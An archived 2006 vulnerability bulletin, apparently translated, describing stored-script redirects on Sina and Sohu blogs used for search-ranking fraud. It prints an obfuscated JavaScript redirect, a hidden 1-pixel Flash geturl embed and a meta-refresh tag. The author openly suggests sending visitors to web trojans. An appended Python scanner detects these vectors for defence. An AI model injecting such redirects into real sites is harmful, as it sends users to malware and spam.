Using Sina and Sohu blog domains for redirection - vulnerability warning - the black bar safety net

2006-07-19T00:00:00
ID MYHACK58:62200610529
Type myhack58
Reporter Anonymous
Modified 2006-07-19T00:00:00

Description

Article author: light and shadow. Source of information: the Red wolf security group (www.wolfexp.net)

1. The Sina blog does not filter scripts. Put simply: a while ago, when I was working on Google ranking cheating, I wanted to use a sina domain name for redirection. Because a blog's PR value is generally high and it carries a lot of weight in Baidu and Google, when doing search engine cheating I wanted to use sina and sohu blog domain names to redirect to my site. I later found that the description field of a new link is not filtered, so I added the following statement to redirect to my site.

CODE: <script language=JavaScript>document.write('<sc'+'ript>'+'win'+'dow.loc'+'ation="http://hacker566.blog.sohu.com"</'+'scr'+'ipt>');</script>

2. Sohu: the Flash geturl function. On Baidu I found a powerful ranking-cheating site for the same keyword, one of whose entries uses a sohu blog domain name for redirection. So I tried the code in many places, but it was filtered. I opened that sohu blog domain name, viewed the source code, and found the following code.

CODE: <embed style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 400px; HEIGHT: 3px; TEXT-ALIGN: center" src="http://www.google90.com/80.swf" width="400" height="1" type="application/x-shockwave-flash" loop="false" autostart="false"></embed>

The blog post includes this Flash file: http://www.google90.com/80.swf. After downloading the Flash file I found that it is very small, and opening it jumps directly to another site. Ha ha, now it all makes sense. He simply inserted a width="400" height="1" Flash object into the post, and the Flash file uses the geturl function to jump directly to the...... Other blog domain names are easier to use: when editing the CSS style, adding the following code is enough.

CODE: <meta http-equiv=refresh content=0;url=http://www.xxxx9.com/>

PS: a blog's PR value is relatively high, so its weight in search is relatively high. Apply for a free blog, add popular keywords, and redirect to our web trojans, well... HOHO......
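
A server-side check for the three redirect vectors described above, as an added example that is not part of the original article: it parses a submitted blog field and flags script elements, thin Flash embeds and meta refresh tags, and it shows that a keyword blocklist misses the concatenated script from item 1. The field names, the `TINY_PX` threshold and the `example.invalid` hosts are assumptions.

```python
import re
from html.parser import HTMLParser

TINY_PX = 5  # assumption: an embed this thin in either dimension is effectively invisible

def _px(value):
    """Leading integer of '1' or '3px'; None when absent or non-numeric."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None

class RedirectVectorScanner(HTMLParser):
    """Records (vector, detail) for each redirect-capable element in a user field."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}
        if tag == "script":  # any script element, however its body is obfuscated
            self.findings.append(("script", a.get("src", "inline")))
        elif tag in ("embed", "object"):
            dims = [_px(a.get("width")), _px(a.get("height"))]
            dims += [int(n) for n in re.findall(
                r"(?:width|height)\s*:\s*(\d+)px", a.get("style", ""), re.I)]
            hidden = any(d is not None and d <= TINY_PX for d in dims)
            self.findings.append(("hidden-embed" if hidden else "embed", a.get("src", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))

def scan(fragment):
    """Return the findings for one submitted field (empty list = nothing flagged)."""
    scanner = RedirectVectorScanner()
    scanner.feed(fragment)
    scanner.close()
    return scanner.findings

def keyword_filter_blocks(fragment):
    """Naive blocklist, for comparison: matches only the literal keyword."""
    return "window.location" in fragment.lower()

# Constructed samples modelled on the three snippets; hosts are placeholders.
SAMPLES = {
    "link_description": """<script language=JavaScript>document.write('<sc'+'ript>'+'win'+'dow.loc'+'ation="http://a.example.invalid"</'+'scr'+'ipt>');</script>""",
    "post_body": '<embed style="WIDTH: 400px; HEIGHT: 3px" src="http://b.example.invalid/x.swf" width="400" height="1" type="application/x-shockwave-flash"></embed>',
    "css_field": "<meta http-equiv=refresh content=0;url=http://c.example.invalid/>",
    "benign": '<p>My <a href="http://d.example.invalid/">links</a></p>',
}

if __name__ == "__main__":
    for field, html in SAMPLES.items():
        print(field, scan(html), "keyword filter blocks:", keyword_filter_blocks(html))
```

Rejecting or stripping any field with a non-empty findings list closes all three paths; an allowlist of permitted tags and attributes is stricter still.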